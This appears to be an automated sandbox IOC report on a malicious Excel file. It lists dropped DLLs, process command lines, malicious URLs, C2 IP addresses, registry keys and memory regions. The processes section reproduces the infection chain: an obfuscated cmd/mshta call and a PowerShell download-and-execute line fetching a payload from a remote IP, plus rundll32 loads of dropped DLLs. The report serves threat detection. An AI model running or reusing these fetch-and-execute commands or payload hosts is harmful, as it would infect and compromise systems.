IOC Report

loading gif

Files

File Path
Type
Category
Malicious
364453688149503140239183.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 20:28:58 2022, Last Saved Time/Date: Thu Jan 27 20:32:51 2022, Security: 0
initial sample
malicious
C:\ProgramData\QWER.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Desktop\364453688149503140239183.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 20:28:58 2022, Last Saved Time/Date: Thu Jan 27 20:32:51 2022, Security: 0
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
data
downloaded
C:\Users\user\AppData\Local\Temp\4B14.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\~DF61981CC6FBEE46E0.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFB91905051C23B5E7.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1K4VR2PW3EG92IH5IDUU.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\cmd.exe
CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
malicious
C:\Windows\System32\mshta.exe
mshta http://91.240.118.168/vvv/ppp/fe.html
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
malicious
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://91.240.118.168/vvv/ppp/fe.htmlWinSta0
unknown
malicious
http://91.240.118.168/vvv/ppp/fe
unknown
malicious
http://cmit.valestudios.com/wp-admin/RueGJ41A/
unknown
malicious
http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/
unknown
malicious
http://91.240.118.168/vvv/ppp/fe.htmlv1.0
unknown
malicious
http://bawelnianka.cfolks.pl/wp-content/Ttv/
unknown
malicious
http://91.240.11
unknown
malicious
http://ayoobeducationaltrust.in
unknown
malicious
http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/
139.59.58.214
malicious
http://91.240.118.168/vvv/ppp/fe.pngPE3
unknown
malicious
http://cmit.valestudios.com/wp-a
unknown
malicious
http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3
unknown
malicious
http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3
unknown
malicious
http://91.240.118.168/vvv/ppp/fe.htmlmshta
unknown
malicious
http://test.valestudios.com/wp-c
unknown
malicious
http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3
unknown
malicious
http://thesocialagent.net/b/MO5AKqJ9Ty9lE/
unknown
malicious
http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3
unknown
malicious
http://91.240.118.168/vvv/ppp/fe.png
91.240.118.168
malicious
http://91.2
unknown
malicious
http://test.dreamcityorlando.com
unknown
malicious
http://91.240.118.168/vvv/ppp/fe.htmlC:
unknown
malicious
http://curvygirlsboutique.com/jf
unknown
malicious
http://91.240.118.168/vvv/ppp/fe.html3
unknown
malicious
http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3
unknown
malicious
http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3
unknown
malicious
http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/
unknown
malicious
http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html
unknown
malicious
http://crm.compracasaenhouston.com/hs4d8a/c0s13I/
unknown
malicious
http://91.240.118.168/vvv/ppp/fe.html
91.240.118.168
malicious
http://test.dreamcityorlando.com/t0mmx/xBBXi/
unknown
malicious
http://cmit.valestudios.com/wp-admin/RueGJ41A/PE3
unknown
malicious
http://91.240.118.168/vvv/ppp/fe.html17
unknown
malicious
http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/PE3
unknown
malicious
http://91.240.118.168
unknown
malicious
http://ayoobeducationaltrust.in/
unknown
malicious
http://test.dreamcityorlando.com/t0mmx/xBBXi/PE3
unknown
malicious
http://91.240.118.168/vvv/ppp/fe.htmlfunction
unknown
malicious
http://sellin.ap
unknown
http://test.drea
unknown
https://160.16.102.168:80/gYIhzpB
unknown
http://huculek.f
unknown
https://160.16.102.168:80/gYIhzpA
unknown
http://www.protware.com/
unknown
https://160.16.102.168:80/gYIhzp
unknown
http://crm.compracasaenhouston.c
unknown
http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/PE3
unknown
http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/
unknown
http://test.vale
unknown
http://crm.compr
unknown
http://lynsmithgroup.com/hftm2i2
unknown
https://160.16.102.168:80/gYIhzpz
unknown
http://sellin.app/wp-admin/S2cDPYXNKEnT/
unknown
http://www.protware.com
unknown
http://sellin.app/wp-admin/S2cDP
unknown
https://160.16.102.168:80/gYIhzpK
unknown
http://cmit.vale
unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
https://160.16.102.168:80/gYIhzpH
unknown
http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/PE3
unknown
http://www.piriform.com/ccleaner
unknown
http://thesocialagent.net/b/MO5A
unknown
http://bawelnianka.cfolks.pl/wp-
unknown
http://huculek.futurehost.pl/ima
unknown
http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/
unknown
There are 55 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ayoobeducationaltrust.in
139.59.58.214
malicious

IPs

IP
Domain
Country
Malicious
195.154.133.20
unknown
France
malicious
185.157.82.211
unknown
Poland
malicious
212.237.17.99
unknown
Italy
malicious
79.172.212.216
unknown
Hungary
malicious
110.232.117.186
unknown
Australia
malicious
173.214.173.220
unknown
United States
malicious
212.24.98.99
unknown
Lithuania
malicious
138.185.72.26
unknown
Brazil
malicious
178.63.25.185
unknown
Germany
malicious
160.16.102.168
unknown
Japan
malicious
81.0.236.90
unknown
Czech Republic
malicious
103.75.201.2
unknown
Thailand
malicious
216.158.226.206
unknown
United States
malicious
45.118.115.99
unknown
Indonesia
malicious
51.15.4.22
unknown
France
malicious
159.89.230.105
unknown
United States
malicious
162.214.50.39
unknown
United States
malicious
91.240.118.168
unknown
unknown
malicious
200.17.134.35
unknown
Brazil
malicious
217.182.143.207
unknown
France
malicious
107.182.225.142
unknown
United States
malicious
51.38.71.0
unknown
France
malicious
45.118.135.203
unknown
Japan
malicious
50.116.54.215
unknown
United States
malicious
139.59.58.214
ayoobeducationaltrust.in
Singapore
malicious
131.100.24.231
unknown
Brazil
malicious
46.55.222.11
unknown
Bulgaria
malicious
41.76.108.46
unknown
South Africa
malicious
173.212.193.249
unknown
Germany
malicious
45.176.232.124
unknown
Colombia
malicious
178.79.147.66
unknown
United Kingdom
malicious
212.237.5.209
unknown
Italy
malicious
162.243.175.63
unknown
United States
malicious
176.104.106.96
unknown
Serbia
malicious
207.38.84.195
unknown
United States
malicious
164.68.99.3
unknown
Germany
malicious
192.254.71.210
unknown
United States
malicious
212.237.56.116
unknown
Italy
malicious
104.168.155.129
unknown
United States
malicious
45.142.114.231
unknown
Germany
malicious
203.114.109.124
unknown
Thailand
malicious
209.59.138.75
unknown
United States
malicious
159.8.59.82
unknown
United States
malicious
129.232.188.93
unknown
South Africa
malicious
58.227.42.236
unknown
Korea Republic of
malicious
158.69.222.101
unknown
Canada
malicious
104.251.214.46
unknown
United States
malicious
There are 37 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
-0(
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2EB29
2EB29
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
f5(
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35409
35409
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35B88
35B88
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 61 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1C0000
trusted library allocation
page execute and read and write
malicious
2F40000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
30B1000
trusted library allocation
page execute read
malicious
8F1000
trusted library allocation
page execute read
malicious
201000
trusted library allocation
page execute read
malicious
2851000
trusted library allocation
page execute read
malicious
2C91000
unkown
page execute read
malicious
351000
trusted library allocation
page execute read
malicious
2820000
trusted library allocation
page execute and read and write
malicious
27E0000
trusted library allocation
page execute and read and write
malicious
24F0000
trusted library allocation
page execute and read and write
malicious
26A0000
trusted library allocation
page execute and read and write
malicious
2A0000
trusted library allocation
page execute and read and write
malicious
2910000
trusted library allocation
page execute and read and write
malicious
B50000
trusted library allocation
page execute and read and write
malicious
2590000
trusted library allocation
page execute and read and write
malicious
26D1000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
2E41000
trusted library allocation
page execute read
malicious
1E0000
trusted library allocation
page execute and read and write
malicious
2C60000
unkown
page execute and read and write
malicious
2EC1000
unkown
page execute read
malicious
CC0000
trusted library allocation
page execute and read and write
malicious
441000
trusted library allocation
page execute read
malicious
341000
trusted library allocation
page execute read
malicious
2D00000
unkown
page execute and read and write
malicious
B01000
trusted library allocation
page execute read
malicious
2860000
trusted library allocation
page execute and read and write
malicious
2A1000
trusted library allocation
page execute read
malicious
3A0000
trusted library allocation
page execute and read and write
malicious
BC1000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
470000
trusted library allocation
page execute and read and write
malicious
270000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
AC1000
trusted library allocation
page execute read
malicious
A30000
trusted library allocation
page execute and read and write
malicious
B50000
trusted library allocation
page execute and read and write
malicious
210000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
2E00000
trusted library allocation
page execute and read and write
malicious
2521000
trusted library allocation
page execute read
malicious
5A1000
trusted library allocation
page execute read
malicious
AE1000
trusted library allocation
page execute read
malicious
4E1000
trusted library allocation
page execute read
malicious
25E1000
trusted library allocation
page execute read
malicious
1E1000
trusted library allocation
page execute read
malicious
310000
trusted library allocation
page execute and read and write
malicious
170000
trusted library allocation
page execute and read and write
malicious
4B0000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
2FE0000
trusted library allocation
page execute and read and write
malicious
2E90000
unkown
page execute and read and write
malicious
380000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
190000
trusted library allocation
page execute and read and write
malicious
2F61000
trusted library allocation
page execute read
malicious
BD1000
trusted library allocation
page execute read
malicious
2E81000
trusted library allocation
page execute read
malicious
840000
trusted library allocation
page execute and read and write
malicious
2891000
trusted library allocation
page execute read
malicious
2E61000
unkown
page execute read
malicious
3021000
trusted library allocation
page execute read
malicious
2E71000
trusted library allocation
page execute read
malicious
B81000
trusted library allocation
page execute read
malicious
B20000
trusted library allocation
page execute and read and write
malicious
2DD1000
trusted library allocation
page execute read
malicious
BD1000
trusted library allocation
page execute read
malicious
A31000
trusted library allocation
page execute read
malicious
1D0000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
B10000
trusted library allocation
page execute and read and write
malicious
2D1000
trusted library allocation
page execute read
malicious
A00000
trusted library allocation
page execute and read and write
malicious
201000
trusted library allocation
page execute read
malicious
2874000
trusted library allocation
page read and write
45D000
heap
page read and write
3585000
trusted library allocation
page read and write
2E64000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
151000
heap
page read and write
362E000
trusted library allocation
page read and write
2CD000
stack
page read and write
33DF000
heap
page read and write
2E40000
trusted library allocation
page read and write
BE4000
trusted library allocation
page read and write
55AF000
heap
page read and write
1C9FD000
stack
page read and write
2E000
heap
page read and write
5589000
heap
page read and write
39F4000
heap
page read and write
5794000
trusted library allocation
page read and write
5ABF000
heap
page read and write
56A000
heap
page read and write
3626000
trusted library allocation
page read and write
396A000
trusted library allocation
page read and write
2F98000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
3453000
heap
page read and write
2543000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
5B7000
heap
page read and write
180000
heap
page read and write
2F60000
trusted library allocation
page read and write
1005A000
unkown
page readonly
130000
heap
page read and write
1ED0000
trusted library allocation
page read and write
8D2E000
trusted library allocation
page read and write
3417000
heap
page read and write
10057000
unkown
page read and write
346D000
heap
page read and write
36BA000
trusted library allocation
page read and write
39E9000
trusted library allocation
page read and write
36F8000
trusted library allocation
page read and write
3110000
trusted library allocation
page read and write
5ACF000
heap
page read and write
3217000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
36BA000
trusted library allocation
page read and write
2E94000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
320B000
trusted library allocation
page read and write
2F87000
trusted library allocation
page read and write
3585000
trusted library allocation
page read and write
321C000
trusted library allocation
page read and write
2940000
trusted library allocation
page read and write
3F1C000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
200000
trusted library allocation
page read and write
7DC9000
trusted library allocation
page read and write
2C0E000
trusted library allocation
page read and write
3F11000
trusted library allocation
page read and write
290E000
stack
page read and write
2D40000
trusted library allocation
page read and write
7FF00220000
trusted library allocation
page execute and read and write
1B46A000
heap
page read and write
7FF00032000
trusted library allocation
page execute and read and write
2C10000
trusted library allocation
page read and write
B7F000
stack
page read and write
52D0000
trusted library allocation
page read and write
10057000
unkown
page read and write
578B000
trusted library allocation
page read and write
3F3B000
trusted library allocation
page read and write
33CE000
heap
page read and write
2BD4000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
5AC8000
heap
page read and write
319E000
trusted library allocation
page read and write
3F46000
trusted library allocation
page read and write
BF4000
trusted library allocation
page read and write
1D00000
heap
page read and write
370F000
trusted library allocation
page read and write
393C000
stack
page read and write
2FF5000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
3211000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
13B000
heap
page read and write
3217000
trusted library allocation
page read and write
2FE0000
trusted library allocation
page read and write
578B000
trusted library allocation
page read and write
3370000
heap
page read and write
2FF8000
trusted library allocation
page read and write
39BF000
trusted library allocation
page read and write
2F3000
trusted library allocation
page read and write
2C0E000
trusted library allocation
page read and write
2530000
trusted library allocation
page read and write
BD0000
trusted library allocation
page read and write
122000
heap
page read and write
8F0000
trusted library allocation
page read and write
3F46000
trusted library allocation
page read and write
3EAB000
stack
page read and write
204000
trusted library allocation
page read and write
10053000
unkown
page read and write
25F0000
trusted library allocation
page read and write
2D70000
trusted library allocation
page read and write
250000
trusted library allocation
page read and write
3619000
trusted library allocation
page read and write
288D000
stack
page read and write
D2E000
stack
page read and write
3626000
trusted library allocation
page read and write
130000
heap
page read and write
370B000
trusted library allocation
page read and write
2F1000
stack
page read and write
2EA3000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
3C0000
heap
page read and write
57A3000
trusted library allocation
page read and write
3567000
trusted library allocation
page read and write
AE0000
trusted library allocation
page read and write
33F8000
heap
page read and write
1B4A7000
heap
page read and write
2836000
heap
page read and write
25E0000
heap
page read and write
440000
trusted library allocation
page read and write
BD0000
trusted library allocation
page read and write
33DE000
heap
page read and write
10000
heap
page read and write
7FF0003A000
trusted library allocation
page execute and read and write
2C01000
trusted library allocation
page read and write
A8F000
trusted library allocation
page read and write
2FE0000
trusted library allocation
page read and write
2C5D000
stack
page read and write
54C000
heap
page read and write
7FF0010A000
trusted library allocation
page execute and read and write
5A96000
heap
page read and write
141000
heap
page read and write
1ED0000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
3438000
heap
page read and write
345D000
heap
page read and write
2E60000
unkown
page read and write
2F29000
trusted library allocation
page read and write
6BC000
heap
page read and write
3F3E000
trusted library allocation
page read and write
5AAB000
heap
page read and write
250000
trusted library allocation
page read and write
4220000
trusted library allocation
page read and write
3F46000
trusted library allocation
page read and write
536000
heap
page read and write
2CB3000
unkown
page read and write
5794000
trusted library allocation
page read and write
848E000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
8FCE000
trusted library allocation
page read and write
6F0000
trusted library allocation
page read and write
1CB000
heap
page read and write
321F000
trusted library allocation
page read and write
3208000
trusted library allocation
page read and write
BC0000
heap
page read and write
39F3000
trusted library allocation
page read and write
AD0000
heap
page read and write
25B0000
trusted library allocation
page read and write
320000
heap
page read and write
448C000
stack
page read and write
370B000
trusted library allocation
page read and write
1BBC0000
heap
page read and write
5AB9000
heap
page read and write
346D000
heap
page read and write
3217000
trusted library allocation
page read and write
10000
heap
page read and write
2C01000
trusted library allocation
page read and write
5AC8000
heap
page read and write
2E000
heap
page read and write
3A70000
heap
page read and write
35F9000
trusted library allocation
page read and write
5B1000
heap
page read and write
3BAF000
trusted library allocation
page read and write
5A96000
heap
page read and write
345B000
heap
page read and write
57A3000
trusted library allocation
page read and write
910E000
trusted library allocation
page read and write
2B48000
trusted library allocation
page read and write
2EC1000
trusted library allocation
page read and write
5AD000
heap
page read and write
2360000
heap
page read and write
371C000
trusted library allocation
page read and write
340000
heap
page read and write
13A000
stack
page read and write
35CE000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
14F000
heap
page read and write
321B000
trusted library allocation
page read and write
2BE4000
trusted library allocation
page read and write
5AD000
heap
page read and write
345D000
heap
page read and write
3444000
heap
page read and write
30CE000
trusted library allocation
page read and write
362F000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
2E7E000
stack
page read and write
5B07000
heap
page read and write
2C10000
trusted library allocation
page read and write
3628000
trusted library allocation
page read and write
301D000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
7FF001E0000
trusted library allocation
page read and write
122000
heap
page read and write
3F3E000
trusted library allocation
page read and write
911E000
trusted library allocation
page read and write
2BE4000
trusted library allocation
page read and write
503000
trusted library allocation
page read and write
167000
heap
page read and write
55D000
heap
page read and write
911E000
trusted library allocation
page read and write
1F14000
heap
page read and write
48A000
heap
page read and write
2F9C000
trusted library allocation
page read and write
224000
trusted library allocation
page read and write
CC000
stack
page read and write
3BAF000
trusted library allocation
page read and write
36BC000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
444000
heap
page read and write
3575000
trusted library allocation
page read and write
2DC0000
heap
page read and write
3B36000
trusted library allocation
page read and write
2F5F000
trusted library allocation
page read and write
235000
stack
page read and write | page guard
3B69000
trusted library allocation
page read and write
39E000
stack
page read and write
8D2E000
trusted library allocation
page read and write
5573000
heap
page read and write
138000
heap
page read and write
2FE0000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
36BC000
trusted library allocation
page read and write
5568000
heap
page read and write
10046000
unkown
page readonly
3CAC000
stack
page read and write
36D0000
trusted library allocation
page read and write
10000000
unkown
page readonly
2E9C000
trusted library allocation
page read and write
55B1000
heap
page read and write
7FF00040000
trusted library allocation
page read and write
330000
heap
page read and write
25DF000
stack
page read and write
3462000
trusted library allocation
page read and write
2F42000
trusted library allocation
page read and write
26C0000
trusted library allocation
page read and write
1ED0000
trusted library section
page read and write
2ED1000
trusted library allocation
page read and write
2BD4000
trusted library allocation
page read and write
36F1000
trusted library allocation
page read and write
5900000
heap
page read and write
5ED000
heap
page read and write
2C10000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
3F3E000
trusted library allocation
page read and write
60000
heap
page read and write
36BA000
trusted library allocation
page read and write
371C000
trusted library allocation
page read and write
8B6E000
trusted library allocation
page read and write
2020000
heap
page read and write
578B000
trusted library allocation
page read and write
3F46000
trusted library allocation
page read and write
3446000
heap
page read and write
3464000
heap
page read and write
BAF000
stack
page read and write
35CE000
trusted library allocation
page read and write
3217000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
2FE0000
